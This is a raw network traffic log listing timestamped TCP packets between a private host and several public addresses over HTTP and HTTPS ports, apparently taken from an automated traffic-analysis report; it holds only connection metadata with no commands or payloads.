                                                                                                                          Oct 13, 2024 18:20:40.909260988 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.909290075 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.910346031 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.910451889 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.910465002 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.910480976 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.910507917 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.910527945 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.912499905 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912514925 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912528992 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912544012 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912574053 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.912617922 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.912841082 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912856102 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912870884 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912884951 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912899017 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912914038 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912914038 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.912929058 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912935972 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.912949085 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912965059 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.912992001 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.913021088 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.913542986 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.913597107 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.913719893 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.913733959 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.913747072 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.913783073 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.927504063 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.927517891 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.927539110 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.927597046 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.927654028 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.927696943 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.930083036 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.930097103 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.930111885 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.930124044 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.930151939 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.930193901 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.939666986 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.939682007 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.939696074 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.939729929 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.939940929 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.939990044 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.955907106 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994389057 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994405031 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994419098 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994434118 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994474888 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994478941 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994489908 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994513035 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994544983 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994577885 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994594097 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994607925 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994625092 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994630098 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994678974 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994689941 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994693041 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.994765997 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.994988918 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.995012999 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.995027065 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.995063066 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.995084047 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.995099068 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.995130062 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:40.995276928 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:40.995327950 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.036062956 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.036082983 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.036098957 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.036159039 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.036195040 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.036245108 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.040023088 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.044807911 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.348309994 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.348330021 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.348381996 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.348412037 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.348472118 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.357899904 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.358093023 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.358120918 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.359613895 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.359688997 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.362001896 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.362088919 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.362144947 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.384262085 CEST4974580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.389086008 CEST80497453.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.389158010 CEST4974580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.389265060 CEST4974580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.394603968 CEST80497453.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.403446913 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.409202099 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.409261942 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.448404074 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.448451996 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.448522091 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.448750019 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.448769093 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.449662924 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.449738026 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.449814081 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.450587988 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.450619936 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.455046892 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.479995966 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.480674982 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.481054068 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.481614113 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.482705116 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.484801054 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.485491991 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.485811949 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.486422062 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.487533092 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.529458046 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.534356117 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.582442045 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.582511902 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.582532883 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.582550049 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.582582951 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.582639933 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.582673073 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.604130030 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.604149103 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.604166985 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.604178905 CEST80497353.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.604346037 CEST4973580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.615890026 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.615904093 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.615928888 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.615941048 CEST80497363.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.616101027 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.616101980 CEST4973680192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.619395971 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.619410992 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.619426966 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.619440079 CEST80497393.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.619524002 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.619524002 CEST4973980192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.626321077 CEST80497383.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.632817030 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.642684937 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.642699003 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.642713070 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.642725945 CEST80497403.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.642775059 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.642819881 CEST4974080192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.649177074 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.649198055 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.649214029 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.649261951 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.649308920 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.656209946 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.656269073 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.656289101 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.656320095 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.656687021 CEST80497373.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.656744003 CEST4973780192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.673259974 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673281908 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673297882 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673353910 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.673388004 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.673851967 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673871040 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673919916 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.673945904 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.673948050 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673966885 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.673990965 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.674005032 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.674025059 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.674045086 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.678491116 CEST4973880192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.738276005 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.738481045 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.738493919 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.738518953 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.738563061 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.738588095 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.761674881 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.761806965 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.762233973 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.762394905 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.762399912 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.762460947 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.762607098 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.762639046 CEST44349742173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.762662888 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.762697935 CEST49742443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:41.906271935 CEST80497453.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.906311989 CEST80497453.219.195.73192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.906429052 CEST4974580192.168.2.43.219.195.73
                                                                                                                          Oct 13, 2024 18:20:41.925539017 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.938323021 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.970134974 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.987222910 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.991142035 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.991168976 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.991403103 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.991432905 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.992396116 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.992484093 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.993666887 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.993755102 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.993819952 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:41.994431019 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:41.994533062 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.994616032 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:41.994879961 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:41.994930983 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.995018959 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.995085955 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.996423006 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.996617079 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:41.996742010 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:41.996751070 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.035511971 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.035532951 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.036062956 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.036155939 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.036330938 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.036501884 CEST49752443192.168.2.4173.231.197.227
                                                                                                                          Oct 13, 2024 18:20:42.036535025 CEST44349752173.231.197.227192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.050738096 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:42.077708006 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.107733011 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.107872963 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.108278990 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:42.109361887 CEST49747443192.168.2.4172.67.74.152
                                                                                                                          Oct 13, 2024 18:20:42.109384060 CEST44349747172.67.74.152192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.121437073 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.121542931 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.122436047 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.122622967 CEST49748443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.122637987 CEST4434974834.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.123481989 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.123533964 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.123603106 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.123882055 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.123900890 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.135138035 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.135170937 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.135234118 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.135404110 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.135416985 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.329678059 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:42.329708099 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.329787016 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:42.330018997 CEST49755443192.168.2.4172.217.16.196
                                                                                                                          Oct 13, 2024 18:20:42.330035925 CEST44349755172.217.16.196192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.612286091 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.613393068 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.613452911 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.614423990 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.614517927 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.614964962 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.615029097 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.615196943 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.615215063 CEST44349753104.26.13.205192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.617166996 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.618552923 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.618613958 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.620348930 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.620426893 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.621335030 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.621426105 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.621455908 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.621483088 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.621676922 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.621691942 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.622710943 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.622766972 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.623131990 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.623193026 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.623249054 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.657813072 CEST49753443192.168.2.4104.26.13.205
                                                                                                                          Oct 13, 2024 18:20:42.663400888 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.663419962 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.673748016 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.673758030 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.673757076 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.673783064 CEST44349751162.214.111.33192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.719808102 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.719819069 CEST49751443192.168.2.4162.214.111.33
                                                                                                                          Oct 13, 2024 18:20:42.944669962 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944740057 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944772005 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944785118 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.944817066 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944854021 CEST4434975434.117.59.81192.168.2.4
                                                                                                                          Oct 13, 2024 18:20:42.944868088 CEST49754443192.168.2.434.117.59.81
                                                                                                                          Oct 13, 2024 18:20:42.944875002 CEST4434975434.117.59.81192.168.2.4
